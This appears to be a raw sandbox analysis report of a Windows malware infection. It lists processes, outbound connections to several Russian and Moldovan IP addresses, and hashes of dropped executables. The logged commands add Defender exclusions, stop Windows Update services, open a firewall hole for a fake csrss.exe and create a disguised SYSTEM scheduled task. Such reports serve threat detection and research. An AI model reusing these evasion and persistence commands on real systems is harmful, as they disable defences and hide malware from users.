"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231211092208.log C:\Windows\Logs\CBS\CbsPersist_20231211092208.cab

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\4379.exe

C:\Users\Admin\AppData\Local\Temp\4379.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {C0F010CB-BB92-4761-8B10-3FC9D7772C85} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Users\Admin\AppData\Local\Temp\ACB7.exe

C:\Users\Admin\AppData\Local\Temp\ACB7.exe

Network

Country Destination Domain Proto
RU 81.19.131.34:80 81.19.131.34 tcp
RU 185.172.128.19:80 185.172.128.19 tcp
RU 77.105.132.87:6731 tcp
MD 176.123.7.190:32927 tcp
RU 77.105.132.87:6731 tcp
RU 77.105.132.87:6731 tcp
RU 77.105.132.87:6731 tcp

Files

memory/2116-0-0x0000000000400000-0x000000000040B000-memory.dmp

memory/2116-2-0x0000000000400000-0x000000000040B000-memory.dmp

memory/1220-1-0x0000000002B00000-0x0000000002B16000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C31.exe

MD5 f88edad62a7789c2c5d8047133da5fa7
SHA1 41b1f056cdda764a1c7c402c6fa4f8ab2f3ce5f9
SHA256 eb2b1ce5574096b91eb9e0482117d2518ab188c0747a209dc77e88d30bb970dc
SHA512 e2d5b0ace5dfd3bd2321b2a42b7e7725071ca440389dc5ef12720a34727ae84c2907cd7befeae5d53568d9deaee8443f4cbda44b598cfc9b6316d9389be09a60

memory/2080-12-0x00000000000F0000-0x000000000012C000-memory.dmp

memory/2080-17-0x0000000073F10000-0x00000000745FE000-memory.dmp

memory/2080-18-0x00000000075E0000-0x0000000007620000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B424.exe

MD5 c94b24f6518a3f4284e7123b0086af8e
SHA1 5b1260b8ee49750d16ea0313af7165f5f1f9b4a2
SHA256 701195cafc919bccf2c06b20e3f74c3f5419b15556905f31daa92dd3d841915a
SHA512 ff6dee6aa4777a1356b87af187ac50d6f56836248c7732f6b813e483f97655fcccd04e4da5e2a9ddd5308453eee2975410e4b5cc1702808caf26133ff27181be

C:\Users\Admin\AppData\Local\Temp\B424.exe

MD5 9082c31e554840c3795c2afc093a873c
SHA1 a654430ddc1a55d0d357647f0690e502c7febb1c
SHA256 a380fd5028c4adb5a9149b6f71c35632060c96e3bbb9b3a05946e0067e5b037b
SHA512 d5d0ac48b922970a18f80708404ab8c87a4b9b94dabc0b45aca19c4b0eef5e116d031856640d0de981833c2c018a31074f2a8755b58d01b1c23f867b1e9ae796

memory/2080-26-0x0000000073F10000-0x00000000745FE000-memory.dmp

memory/2532-27-0x0000000073F10000-0x00000000745FE000-memory.dmp

memory/2532-28-0x0000000001110000-0x00000000025C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B962.exe

MD5 91d23595c11c7ee4424b6267aabf3600
SHA1 ef161bb8e90cebdf81f4e53dfccb50c1f90a9a02
SHA256 d58937d468f6ca92b12ee903a16a4908de340f64f894cf7f1c594cd15c0c7e47
SHA512 cb9ed75c14e7b093cabab66c22d412371c639ace31fbe976c71ffec6007bf85b3d7d3e591fe5612e2a035298398d32e1aa7dc0d753f93328ebc2ce8e44fb8d2b

memory/2080-35-0x00000000075E0000-0x0000000007620000-memory.dmp

memory/2560-36-0x0000000073F10000-0x00000000745FE000-memory.dmp

memory/2560-37-0x00000000012C0000-0x00000000012FC000-memory.dmp

memory/2560-38-0x00000000071F0000-0x0000000007230000-memory.dmp

\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 f56c473b355a63144812937b3efff4c4
SHA1 c7037c6aafb5b9be457faee4d0b629ac1a9edcb3
SHA256 7734c5cedf78d64944ac55f8dddbc40440184202c94edabb5cb4c058db53fabb
SHA512 49efc1311a88245ffb3496f265428bdad03ce7429e52af218cfbcb3dbd7d37fa018f6ab79a8008b3c305a2cbeef0172409b97d5db2789ab3b1f16796367e6956

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 77471d919a5e2151fb49f37c315af514
SHA1 0687047ed80aa348bdc1657731f21181995b654c
SHA256 52666594a3e8bd7ac277411e215e1f65a7771f7c1d5b00a9e6ec95fade64f1f1
SHA512 6ffb45e79b03bac2820c98503793cd11c13803f49522eea9334c4c6cd05384dda3a60b0a8a8f363abc439ad444f1a8da290f0350fa69b75b6c3c9701177f8844

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 cde750f39f58f1ec80ef41ce2f4f1db9
SHA1 942ea40349b0e5af7583fd34f4d913398a9c3b96
SHA256 0a434be25f55f27ce0adbdfb08efeac1da01125b3e9194a94669bc7e9c6fe094
SHA512 c181faacbef70f8a91606943470af50cfd443958c48601051371ff5d9bf66bb9ec794571b05a347a7f5776f06484dc007f535591d2f5e1c57e3c0ee04f3e9580

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 4a9e40fa8264d6e63bf044600ae92ec1
SHA1 917d952821b9c1ae38205a036ee4540afdf48f8a
SHA256 611487839bfadd009afa344945503a08ea240b2b966b924ab6c0cc160995798d
SHA512 1a1a1eb60e1710e6ad89bc3c4e7d87d032a463f905d03ff7f1a8bfc18ed81cb96951fe315659526b2ce40a55d05de3601c19643a17b915c1bb4efed43aaeea20

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 6200a658245d0bf4fab336e6018a8fef
SHA1 c4bd77e3561eeda70eb68432fa0b146e8777a648
SHA256 7ab8cb78dd3a44504e05aacb1daec6771793c4072c4a1e2bdb959799f8e96b66
SHA512 496dcb042306af0c59134a4f4b2def798926869f537c6c650d67efc3e803804b88a0d07005fbf8714e7d8fb7dc145419c9da42c6f02d9ac57d41a7353325b5d9

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 5ac65af3e0f66483939df609c943687b
SHA1 78c3ecf5ba7e83af38c9757106c7e6f707ff3d06
SHA256 91e915c23f1af380e877a0ccd735aabd48291c2db113665d690134749b80c351
SHA512 afc52e4ef3fc76258372f0d5ec7cbce31c8b238c62f8007217ba34f327e1a122da6f5715d5f6e3159f8673470a7f1dda4ddccb844f655377eada578801bfa6ab

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 98eff24d7fa8551dd0b43091ba9e863d
SHA1 e8443f8d734e425c6251c69518552f0bcd1c22a9
SHA256 524316c79ec405709dfe99e82100dcb3758960fc250796c2cd2b26eaddbd5451
SHA512 6ec7635c29e8d74539930f055fa7e0a677b93acb622ec49f5059d5331ce22a8767ec5bf4ba673e770f2a3be346cabc974c232e64ba81f4b263b9315be1519ec4

\Users\Admin\AppData\Local\Temp\Broom.exe

MD5 ec84319ca2e52e8ddc444fdbcb1e4666
SHA1 fe7d89bae5c7c5bd8563b9dc4da9a52da2f4549c
SHA256 7b48e22bf0054e327336eeb35ea7dea0ece5db17ae5a3ed7e416f0e4db09ab4b
SHA512 22a1f636bd2cf22cdd807aa022088b7f84dca12b2b906cfc703db4438bf58eaaeea5bbb87f0e37ad578281bcc0f19812443303b2540eeaa7e43680921a787a54

C:\Users\Admin\AppData\Local\Temp\Broom.exe

MD5 0b603f86939ba69bf133915c6871d0e6
SHA1 8998a419786e1d3722835962cdc0f0d942909a24
SHA256 6d0caf948329a7fb4628073c51188ab5877a942fdded1b63706855653c795d48
SHA512 d139849db2417729e1ca0ff4c91520b41513da366258f44077dd57ccc16bdaf38b79f937668740bfeeb766e715ea7bcfbd386ff8f8930768c9445ea6cab12089

\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 f673b327203f45d0c12815e59a175ced
SHA1 105c6133f8d4d05dd44ccbf2214210b2eb45be95
SHA256 70b4a85c674d6b17bfd114b2b97adafcb07ba97586b62d59bde8ad179d3d9be8
SHA512 de74814594a5405603ff38b3377ae84d1bf3c2bd7d737fa0160c6e4f45e27058de75115fba468ca0f3f7ab01ffa66689d193af29c451d3684bfbf925f62510e9

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 555f59366510e35bd7191edededd052b
SHA1 4507fc4a52a76efcfd8afb28f6c95023fd953bcd
SHA256 d70008131c459e2d73aa0c2894005e12c8c33fb0417df61b9c4ce424cdbb93e4
SHA512 98c85e611ea1edfcf83d8622ab5af02f05968a9a377635050af5f4f435313515510f7c72ca85ba51123dc139e929375709f085af97879bdc9a11755b49551bc4

memory/1968-75-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 315283edfb9669f4e36189fe591a9741
SHA1 8b428b50643a688e73eaea880e3fba39c2addca9
SHA256 31643fc0c9205763f3a8afc73ebbf7b3a47d613cd74d0d6f1fc3857429427f19
SHA512 50bfc177cc511e3efa893b6e57d979b539dadb31af4e9cbca7059f40d3a981a7b3d4d8227b9e004c73c97fbe2f08e54a7af2efc336485e5e6eb51eb79eeca247

memory/1332-78-0x0000000000230000-0x0000000000231000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-3EGTU.tmp\tuc3.tmp

MD5 5525670a9e72d77b368a9aa4b8c814c1
SHA1 3fdad952ea00175f3a6e549b5dca4f568e394612
SHA256 1180706added2a7899f08f25a9f88ecff5d003ba8964f918d00779565e4a6978
SHA512 757249f7e67f82522a8e3079a22c5cf92111626446a32ad3ef876f23885f62d1bb5bf3238d564e23531d062fe18742568dfc00e33b049bb8eef05eb953ef981a

memory/1740-86-0x0000000000C20000-0x0000000000D20000-memory.dmp

memory/1740-87-0x0000000000220000-0x0000000000229000-memory.dmp

memory/268-106-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-1U35R.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

\Users\Admin\AppData\Local\Temp\is-1U35R.tmp\_isetup\_isdecmp.dll

MD5 a813d18268affd4763dde940246dc7e5
SHA1 c7366e1fd925c17cc6068001bd38eaef5b42852f
SHA256 e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64
SHA512 b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4

\Users\Admin\AppData\Local\Temp\is-1U35R.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/2756-95-0x0000000000240000-0x0000000000241000-memory.dmp

memory/268-118-0x0000000000400000-0x0000000000409000-memory.dmp

memory/268-120-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2532-121-0x0000000073F10000-0x00000000745FE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 98c988e77ef14ba858e40be58ded5b04
SHA1 c66a760f7662c95fb449b247c9fad43edb85a7e3
SHA256 737d88407dfd3b56fe8e8e018ff963d66ce4641b527c796599e44c3575d5fea2
SHA512 f302f0c7522e67cfb24322520df8032d3e0147a1e930510123c5ff41b82d46cbb5ee464c2c4ed61b72f4159c4690b1f3a77c6e9234de514ee71e41d4cf4525f0

\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/2532-125-0x0000000073F10000-0x00000000745FE000-memory.dmp

memory/944-126-0x0000000002730000-0x0000000002B28000-memory.dmp

memory/944-127-0x0000000002730000-0x0000000002B28000-memory.dmp

memory/2560-128-0x0000000073F10000-0x00000000745FE000-memory.dmp

memory/944-129-0x0000000002B30000-0x000000000341B000-memory.dmp

memory/2560-130-0x00000000071F0000-0x0000000007230000-memory.dmp

memory/944-131-0x0000000000400000-0x0000000000D1C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 e7695b7404683e52db6fe2e5c645ca43
SHA1 f3075bb0fb6e7ca4d195062ee779250b0d2926e7
SHA256 1d8d40f0548bf6a00d849798a4d6ef7734ac31f43eae2942bc14a292470f7d82
SHA512 4efea23dde463f7b9367535ac71b966a89d7a713430dabef15bc077396ace6c201e8cddfbd18cc82d96ca6f7f2ae85c73a387f283026f4fd2081651add2e7c33

memory/1220-134-0x0000000002B60000-0x0000000002B76000-memory.dmp

memory/944-133-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/1332-135-0x0000000000400000-0x0000000000965000-memory.dmp

memory/1968-136-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2756-137-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/268-138-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2060-139-0x000000013FFB0000-0x0000000140551000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 abb5a57c59b4f6a3d8b4f0cac0b43b8c
SHA1 3ae95d220b37aa73cae850952417586222c2dda2
SHA256 e06d2a34e0221ecc2d1d4052a6513cb7be5fef90b7f22947e0ddcc40e6cfe7ca
SHA512 0b4ce0bc6ddf53faa9971ac7ab938771b5c7308541b87b4b7e4c7baf2d0508b0565d0771c329c74ac8971213f5ea63c7f31100ea54e0bb1e3e6e834856ce5abe

memory/944-141-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/944-142-0x0000000002B30000-0x000000000341B000-memory.dmp

memory/944-143-0x0000000002730000-0x0000000002B28000-memory.dmp

memory/1332-146-0x0000000000230000-0x0000000000231000-memory.dmp

memory/2952-149-0x00000000025B0000-0x00000000029A8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4379.exe

MD5 37a9cca03d6d8aae8fe676aea4297e47
SHA1 d082a9bfa4e3f5f8af6cd810b12500aa9310a246
SHA256 628ff3a1bb708fd04d69da7857b743233672695725a93aaf6f1301459bd32035
SHA512 d98e6fd2d3db0ccc85aabf6c6b70a3dbbf4a8b66bf4a8060d0d1c234c7e1582827c6462c766e697ab92168276584a288f9907590e9b52747bea0d0d7257b8f83

C:\Users\Admin\AppData\Local\Temp\4379.exe

MD5 acd4e9d2d0fbb96258d6567cf0c12316
SHA1 264f55756ff65419628398a3679a8c3dd588d926
SHA256 68cda7a9788d1e38965b6fecdcc6a852e90acb531b45eb8aa15f11c61aea4fd9
SHA512 e3cbff560b263351877a42f3d2e1e445dafb5d61cb1daa774259f0a7f68e1284226efb5c4a0024ee6ca6b34a30ca808b08facabeceb693013565cba1fc8d010c

memory/1304-157-0x00000000003F0000-0x00000000009A2000-memory.dmp

memory/2756-159-0x0000000000240000-0x0000000000241000-memory.dmp

memory/1304-160-0x0000000073F10000-0x00000000745FE000-memory.dmp

memory/1304-161-0x0000000005270000-0x00000000052B0000-memory.dmp

memory/2952-165-0x00000000025B0000-0x00000000029A8000-memory.dmp

memory/2952-166-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/2592-182-0x000000001B170000-0x000000001B452000-memory.dmp

memory/2592-183-0x0000000002450000-0x0000000002458000-memory.dmp

memory/2592-184-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

memory/2592-185-0x00000000026A0000-0x0000000002720000-memory.dmp

memory/2592-186-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

memory/2592-187-0x00000000026A0000-0x0000000002720000-memory.dmp

memory/2592-188-0x00000000026A0000-0x0000000002720000-memory.dmp

memory/2592-189-0x00000000026A0000-0x0000000002720000-memory.dmp

memory/2952-190-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/2592-191-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 45a2067cbf4567e288d07019eb7a68cd
SHA1 5fefc731d044d6247050f76db9ac383c269f7794
SHA256 65b53059a7831dc2b6cd29a953868361b3b37af0b258a64ec1cc605806e2d007
SHA512 2259f13c74d96f13d2160c581dd97d7cb57fb8f9cc51b87bdbff4f2c755f218fab0f94ad67b8ace0bc93da43fd4656ca5b986a7285027d2b7f818516f862a35a

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AJIFV1B30XNNZQ6MKOG8.temp

MD5 822597e8d9d3e1702f58d8b759ebb98e
SHA1 aee89a768cf79e544e9313d63b8bfaa70c8fbafb
SHA256 01da5f43fad9a532f576f8baf2b2a77057db2638dadec03b10321f43a3fc4670
SHA512 e978b06fc674de11a0c6ae8c30ea57798208e750c3488bc2b3383e746bd369702ed0b6933412123eb7e206c136888faefbbe6d3619fde97dc969be12617fc402

memory/1876-202-0x0000000001F50000-0x0000000001F58000-memory.dmp

memory/1876-201-0x000000001B160000-0x000000001B442000-memory.dmp

memory/1876-203-0x000007FEF5040000-0x000007FEF59DD000-memory.dmp

memory/1876-204-0x00000000023E0000-0x0000000002460000-memory.dmp

memory/1876-205-0x000007FEF5040000-0x000007FEF59DD000-memory.dmp

memory/1876-206-0x00000000023E0000-0x0000000002460000-memory.dmp

memory/1876-207-0x00000000023E0000-0x0000000002460000-memory.dmp

\Windows\rss\csrss.exe

MD5 9890563f729fd6204fe444239ef96712
SHA1 1e326dce79e8fbd7b3fbb58c42ee8cbd0f19b01c
SHA256 2cf2533ea3dc8865b0de7abb4e8e44feb0d3eb5964eed911adad73924331d4a5
SHA512 54e3dd8913a6cbe1545476a861308505f05e75b5b0b9051ffeb04ac952378564a6385419db3f86d6a5130d292aab8ae9614fe253bd78db20402bb8ef12535e67

memory/1304-210-0x00000000054B0000-0x0000000005642000-memory.dmp

memory/2952-218-0x0000000000400000-0x0000000000D1C000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 be7a91954af6ada6a01c772ed847bf34
SHA1 a63ff4ee47dd98cb1a8421829fecdbfaebc05cfd
SHA256 870521d8d909645904244a2c6b1716569e633156fe30868c5590041dde4e63a5
SHA512 1d2f3c88a71183531b1c4c319832f54f9070fe1b64bdb35e3ab3dc26fd45cc11ec16ab4f5a4b7b492cfdc8d46258f5c916fc12ce393edf789a42b377f4f4418d

memory/1876-219-0x00000000023E0000-0x0000000002460000-memory.dmp

memory/1876-220-0x000007FEF5040000-0x000007FEF59DD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 f36c6dc3ceca249d70b66af7b97492b3
SHA1 0a798a00dd9ab4716535116987acc22b7fe3f933
SHA256 9de3209114a3274f94cc8fc05bdb4cd361908ffcd8b769e91e827fcbecce4c6d
SHA512 08e99b720f9e499c7ef018e17f921932a90d16e416df3b1d680121b7866efd4c2693b00fdaeacaf85cac927a1e13beeaf9546e92e9f64e08478aacd80ae3a97f

memory/2060-223-0x000000013FFB0000-0x0000000140551000-memory.dmp

\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll

MD5 544cd51a596619b78e9b54b70088307d
SHA1 4769ddd2dbc1dc44b758964ed0bd231b85880b65
SHA256 dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd
SHA512 f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719

memory/1304-228-0x0000000002320000-0x0000000002330000-memory.dmp

memory/1304-229-0x0000000073F10000-0x00000000745FE000-memory.dmp

memory/1304-230-0x0000000005270000-0x00000000052B0000-memory.dmp

memory/1304-231-0x0000000005270000-0x00000000052B0000-memory.dmp

memory/1304-232-0x0000000005270000-0x00000000052B0000-memory.dmp

memory/1304-233-0x0000000005270000-0x00000000052B0000-memory.dmp

memory/1304-234-0x0000000005270000-0x00000000052B0000-memory.dmp

memory/1304-236-0x0000000005270000-0x00000000052B0000-memory.dmp

memory/1304-237-0x0000000005270000-0x00000000052B0000-memory.dmp

memory/1304-238-0x0000000005270000-0x00000000052B0000-memory.dmp

memory/1304-240-0x0000000005A70000-0x0000000005B70000-memory.dmp

memory/1304-241-0x0000000005270000-0x00000000052B0000-memory.dmp

memory/1964-243-0x00000000025B0000-0x00000000029A8000-memory.dmp

memory/1964-246-0x0000000000400000-0x0000000000D1C000-memory.dmp